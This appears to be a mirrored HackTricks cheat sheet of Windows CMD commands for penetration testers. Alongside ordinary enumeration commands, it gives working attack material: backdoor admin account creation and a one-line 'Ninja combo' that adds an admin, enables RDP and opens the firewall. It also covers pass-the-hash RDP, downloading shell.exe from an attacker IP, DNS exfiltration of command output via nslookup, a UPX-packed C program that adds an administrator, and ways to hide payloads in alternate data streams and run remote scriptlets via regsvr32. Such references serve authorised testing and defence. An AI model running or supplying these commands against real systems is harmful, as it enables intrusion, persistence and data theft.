mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-23 11:33:29 +00:00
433 lines
14 KiB
Markdown
433 lines
14 KiB
Markdown
# Basic CMD for Pentesters
|
|
|
|
## System info
|
|
|
|
### Version and Patches info
|
|
|
|
```bash
|
|
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture
|
|
systeminfo
|
|
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
|
|
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
|
|
hostname
|
|
DRIVERQUERY #3rd party driver vulnerable?
|
|
```
|
|
|
|
### Environment
|
|
|
|
```bash
|
|
set #List all environment variables
|
|
```
|
|
|
|
Some env variables to highlight:
|
|
|
|
* **COMPUTERNAME**: Name of the computer
|
|
* **TEMP/TMP:** Temp folder
|
|
* **USERNAME:** Your username
|
|
* **HOMEPATH/USERPROFILE:** Home directory
|
|
* **windir:** C:\Windows
|
|
* **OS**:Windos OS
|
|
* **LOGONSERVER**: Name of domain controller
|
|
* **USERDNSDOMAIN**: Domain name to use with DNS
|
|
* **USERDOMAIN**: Name of the domain
|
|
|
|
```bash
|
|
nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DNS request for DC
|
|
```
|
|
|
|
### Mounted disks
|
|
|
|
```bash
|
|
(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)
|
|
```
|
|
|
|
### AV
|
|
|
|
```bash
|
|
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
|
|
sc query windefend
|
|
```
|
|
|
|
### Recycle Bin
|
|
|
|
```bash
|
|
dir C:\$Recycle.Bin /s /b
|
|
```
|
|
|
|
### Processes, Services & Software
|
|
|
|
```bash
|
|
schtasks /query /fo LIST /v #Verbose out of scheduled tasks
|
|
tasklist /V #List processes
|
|
tasklist /SVC #links processes to started services
|
|
net start #Windows Services started
|
|
wmic service list brief #List services
|
|
sc query #List of services
|
|
dir /a "C:\Program Files" #Installed software
|
|
dir /a "C:\Program Files (x86)" #Installed software
|
|
reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software
|
|
```
|
|
|
|
## Domain info
|
|
|
|
```bash
|
|
echo %USERDOMAIN% #Get domain name
|
|
echo %USERDNSDOMAIN% #Get domain name
|
|
echo %logonserver% #Get name of the domain controller
|
|
set logonserver #Get name of the domain controller
|
|
set log #Get name of the domain controller
|
|
net groups /domain #List of domain groups
|
|
net group "domain computers" /domain #List of PCs connected to the domain
|
|
net view /domain #Lis of PCs of the domain
|
|
nltest /dclist:<DOMAIN> #List domain controllers
|
|
net group "Domain Controllers" /domain #List PC accounts of domains controllers
|
|
net group "Domain Admins" /domain #List users with domain admin privileges
|
|
net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the grup "Domain Admins" is included here)
|
|
net user /domain #List all users of the domain
|
|
net user <ACCOUNT_NAME> /domain #Get information about that user
|
|
net accounts /domain #Password and lockout policy
|
|
nltest /domain_trust #Mapping of the trust relationships.
|
|
```
|
|
|
|
### Logs & Events
|
|
|
|
```bash
|
|
#Make a security query using another credentials
|
|
wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321
|
|
```
|
|
|
|
## Users & Groups
|
|
|
|
### Users
|
|
|
|
```bash
|
|
whoami /all #All info about me, take a look at the enabled tokens
|
|
whoami /priv #Show only privileges
|
|
net users #All users
|
|
dir /b /ad "C:\Users"
|
|
net user %username% #Info about a user (me)
|
|
net accounts #Information about password requirements
|
|
qwinsta #Anyone else logged in?
|
|
cmdkey /list #List credential
|
|
net user /add [username] [password] #Create user
|
|
|
|
#Lauch new cmd.exe with new creds (to impersonate in network)
|
|
runas /netonly /user<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
|
|
```
|
|
|
|
### Groups
|
|
|
|
```bash
|
|
#Local
|
|
net localgroup #All available groups
|
|
net localgroup Administrators #Info about a group (admins)
|
|
new localgroup administrators [username] /add #Add user to administrators
|
|
|
|
#Domain
|
|
net group /domain #Info about domain groups
|
|
net group /domain <domain_group_name> #Users that belongs to the group
|
|
```
|
|
|
|
### List sessions
|
|
|
|
```text
|
|
qwinsta
|
|
klist sessions
|
|
```
|
|
|
|
### Persistence with users
|
|
|
|
```bash
|
|
# Add domain user and put them in Domain Admins group
|
|
net user username password /ADD /DOMAIN
|
|
net group "Domain Admins" username /ADD /DOMAIN
|
|
|
|
# Add local user and put them local Administrators group
|
|
net user username password /ADD
|
|
net localgroup Administrators username /ADD
|
|
|
|
# Add user to insteresting groups:
|
|
net localgroup "Remote Desktop Users" UserLoginName /add
|
|
net localgroup "Debugger users" UserLoginName /add
|
|
net localgroup "Power users" UserLoginName /add
|
|
```
|
|
|
|
## Network
|
|
|
|
### Interfaces, Routes, Ports, Hosts and DNSCache
|
|
|
|
```bash
|
|
ipconfig /all #Info about interfaces
|
|
route print #Print available routes
|
|
arp -a #Know hosts
|
|
netstat -ano #Opened ports?
|
|
type C:\WINDOWS\System32\drivers\etc\hosts
|
|
ipconfig /displaydns | findstr "Record" | findstr "Name Host"
|
|
```
|
|
|
|
### Firewall
|
|
|
|
```bash
|
|
netsh firewall show state # FW info, open ports
|
|
netsh advfirewall firewall show rule name=all
|
|
netsh firewall show config # FW info
|
|
Netsh Advfirewall show allprofiles
|
|
|
|
NetSh Advfirewall set allprofiles state off #Turn Off
|
|
NetSh Advfirewall set allprofiles state on #Trun On
|
|
netsh firewall set opmode disable #Turn Off
|
|
|
|
::How to open ports
|
|
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
|
|
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
|
|
netsh firewall add portopening TCP 3389 "Remote Desktop"
|
|
|
|
::Enable Remote Desktop
|
|
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
|
|
netsh firewall add portopening TCP 3389 "Remote Desktop"
|
|
::netsh firewall set service remotedesktop enable #I found that this line is not needed
|
|
::sc config TermService start= auto #I found that this line is not needed
|
|
::net start Termservice #I found that this line is not needed
|
|
|
|
::Enable Remote assistance:
|
|
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
|
|
netsh firewall set service remoteadmin enable
|
|
|
|
::Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)
|
|
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
|
|
|
|
::Connect to RDP (using hash or password)
|
|
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
|
|
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49
|
|
```
|
|
|
|
### Shares
|
|
|
|
```bash
|
|
net view #Get a list of computers
|
|
net view /all /domain [domainname] #Shares on the domains
|
|
net view \\computer /ALL #List shares of a computer
|
|
net use x: \\computer\share #Mount the share locally
|
|
net share #Check current shares
|
|
```
|
|
|
|
### Wifi
|
|
|
|
```bash
|
|
netsh wlan show profile #AP SSID
|
|
netsh wlan show profile <SSID> key=clear #Get Cleartext Pass
|
|
```
|
|
|
|
### SNMP
|
|
|
|
```text
|
|
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
|
|
```
|
|
|
|
## Misc
|
|
|
|
```bash
|
|
cd #Get current dir
|
|
cd C:\path\to\dir #Change dir
|
|
dir #List current dir
|
|
dir /a:h C:\path\to\dir #List hidden files
|
|
dir /s /b #Recursive list without shit
|
|
time #Get current time
|
|
date #Get current date
|
|
shutdown /r /t 0 #Shutdown now
|
|
type <file> #Cat file
|
|
|
|
#Download
|
|
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe
|
|
bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf
|
|
|
|
#Runas
|
|
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
|
|
runas /netonly /user<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
|
|
|
|
#Hide
|
|
attrib +h file #Set Hidden
|
|
attrib -h file #Quit Hidden
|
|
|
|
#Give full control over a file that you owns
|
|
icacls <FILE_PATH> /t /e /p <USERNAME>:F
|
|
icacls <FILE_PATH> /e /r <USERNAME> #Remove the permision
|
|
|
|
#Recursive copy to smb
|
|
xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win
|
|
|
|
#exe2bat to transform exe file in bat file
|
|
|
|
#ADS
|
|
dir /r #Detect ADS
|
|
more file.txt:ads.txt #read ADS
|
|
powershell (Get-Content file.txt -Stream ads.txt)
|
|
```
|
|
|
|
### Listen address ACLs
|
|
|
|
You can listen on [http://+:80/Temporary\_Listen\_Addresses/](http://+:80/Temporary_Listen_Addresses/) without being administrator.
|
|
|
|
```bash
|
|
netsh http show urlacl
|
|
```
|
|
|
|
### Manual DNS shell
|
|
|
|
**Attacker** \(Kali\) must use one of these 2 options:
|
|
|
|
```bash
|
|
sudo responder -I <iface> #Active
|
|
sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst ip <KALI_IP> #Passive
|
|
```
|
|
|
|
#### Victim
|
|
|
|
_**for /f tokens**_ ****technique: This allows us to execute commands, get the first X words of each line and send it through DNS to our server
|
|
|
|
```text
|
|
for /f %a in ('whoami') do nslookup %a <IP_kali> #Get whoami
|
|
for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali> #Get word2
|
|
for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP_kali> #List folder
|
|
for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c <IP_kali> #List that folder
|
|
for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_kali> #Same as last one
|
|
#More complex commands
|
|
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #Same as last one
|
|
```
|
|
|
|
You can also **redirect** the output, and then **read** it.
|
|
|
|
```text
|
|
whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt
|
|
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>
|
|
```
|
|
|
|
## Calling CMD from C code
|
|
|
|
```c
|
|
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
|
|
|
|
// When executed by Administrator this program will create a user and then add him to the administrators group
|
|
// i686-w64-mingw32-gcc addmin.c -o addmin.exe
|
|
// upx -9 addmin.exe
|
|
|
|
int main (){
|
|
int i;
|
|
i=system("net users otherAcc 0TherAcc! /add");
|
|
i=system("net localgroup administrators otherAcc /add");
|
|
return 0;
|
|
}
|
|
```
|
|
|
|
## Alternate Streams CheatSheet \(ADS/Alternate Data Stream\)
|
|
|
|
Taken from [https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)
|
|
|
|
```bash
|
|
###Add content to ADS###
|
|
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
|
|
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
|
|
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
|
|
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
|
|
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
|
|
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
|
|
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
|
|
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
|
|
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
|
|
esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o
|
|
powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"
|
|
curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe
|
|
cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct ^scrobj.dll > fakefile.doc:reg32.bat
|
|
|
|
### Discover ADS contecnt
|
|
dir /R
|
|
|
|
###Extract content from ADS###
|
|
expand c:\ads\file.txt:test.exe c:\temp\evil.exe
|
|
esentutl.exe /Y C:\temp\file.txt:test.exe /d c:\temp\evil.exe /o
|
|
more < c:\ads\file.txt:test.exe
|
|
|
|
###Executing the ADS content###
|
|
|
|
* WMIC
|
|
wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
|
|
|
|
* Rundll32
|
|
rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain
|
|
rundll32.exe advpack.dll,RegisterOCX not_a_dll.txt:test.dll
|
|
rundll32.exe ieadvpack.dll,RegisterOCX not_a_dll.txt:test.dll
|
|
|
|
* Cscript
|
|
cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs"
|
|
|
|
* Wscript
|
|
wscript c:\ads\file.txt:script.vbs
|
|
echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js
|
|
|
|
* Forfiles
|
|
forfiles /p c:\windows\system32 /m notepad.exe /c "c:\temp\shellloader.dll:bginfo.exe"
|
|
|
|
* Mavinject.exe
|
|
c:\windows\SysWOW64\notepad.exe
|
|
tasklist | findstr notepad
|
|
notepad.exe 4172 31C5CE94259D4006 2 18,476 K
|
|
type c:\temp\AtomicTest.dll > "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
|
|
c:\windows\WinSxS\wow64_microsoft-windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e07aa28c97ebfa48\mavinject.exe 4172 /INJECTRUNNING "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
|
|
|
|
* MSHTA
|
|
mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta"
|
|
(Does not work on Windows 10 1903 and newer)
|
|
|
|
* Control.exe
|
|
control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll
|
|
https://twitter.com/bohops/status/954466315913310209
|
|
|
|
* Create service and run
|
|
sc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
|
|
sc start evilservice
|
|
https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
|
|
|
* Powershell.exe
|
|
powershell -ep bypass - < c:\temp:ttt
|
|
|
|
* Powershell.exe
|
|
powershell -command " & {(Get-Content C:\ADS\1.txt -Stream file.exe -Raw | Set-Content c:\ADS\file.exe) | start-process c:\ADS\file.exe}"
|
|
|
|
* Powershell.exe
|
|
Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = C:\ads\folder:file.exe}
|
|
|
|
* Regedit.exe
|
|
regedit c:\ads\file.txt:regfile.reg
|
|
|
|
* Bitsadmin.exe
|
|
bitsadmin /create myfile
|
|
bitsadmin /addfile myfile c:\windows\system32\notepad.exe c:\data\playfolder\notepad.exe
|
|
bitsadmin /SetNotifyCmdLine myfile c:\ADS\1.txt:cmd.exe NULL
|
|
bitsadmin /RESUME myfile
|
|
|
|
* AppVLP.exe
|
|
AppVLP.exe c:\windows\tracing\test.txt:ha.exe
|
|
|
|
* Cmd.exe
|
|
cmd.exe - < fakefile.doc:reg32.bat
|
|
https://twitter.com/yeyint_mth/status/1143824979139579904
|
|
|
|
* Ftp.exe
|
|
ftp -s:fakefile.txt:aaaa.txt
|
|
https://github.com/sailay1996/misc-bin/blob/master/ads.md
|
|
|
|
* ieframe.dll , shdocvw.dll (ads)
|
|
echo [internetshortcut] > fake.txt:test.txt && echo url=C:\windows\system32\calc.exe >> fake.txt:test.txt rundll32.exe ieframe.dll,OpenURL C:\temp\ads\fake.txt:test.txt
|
|
rundll32.exe shdocvw.dll,OpenURL C:\temp\ads\fake.txt:test.txt
|
|
https://github.com/sailay1996/misc-bin/blob/master/ads.md
|
|
|
|
* bash.exe
|
|
echo calc > fakefile.txt:payload.sh && bash < fakefile.txt:payload.sh
|
|
bash.exe -c $(fakefile.txt:payload.sh)
|
|
https://github.com/sailay1996/misc-bin/blob/master/ads.md
|
|
|
|
* Regsvr32
|
|
type c:\Windows\System32\scrobj.dll > Textfile.txt:LoveADS
|
|
regsvr32 /s /u /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct Textfile.txt:LoveADS
|
|
```
|
|
|